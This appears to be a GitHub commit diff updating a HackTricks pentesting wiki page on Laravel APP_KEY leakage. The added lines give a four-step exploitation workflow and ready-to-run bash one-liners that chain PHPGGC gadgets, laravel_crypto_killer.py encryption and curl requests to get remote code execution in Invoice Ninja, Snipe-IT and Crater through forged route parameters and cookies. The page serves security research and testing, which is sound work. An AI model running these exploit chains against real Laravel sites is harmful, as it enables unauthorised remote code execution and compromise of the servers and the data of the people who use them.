Merge pull request #1219 from HackTricks-wiki/update_Laravel__APP_KEY_Leakage_Analysis_20250731_124055

Laravel APP_KEY Leakage Analysis
This commit is contained in:
SirBroccoli 2025-08-05 00:01:43 +02:00 committed by GitHub
commit af03f5d540

View File

@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
The exploitation workflow is always:
1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
2. Generate gadget with **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Deliver payload through the vulnerable parameter/cookie → **RCE**
1. Obtain or brute-force the 32-byte `APP_KEY`.
2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`).
3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`.
4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**.
Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
## References
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)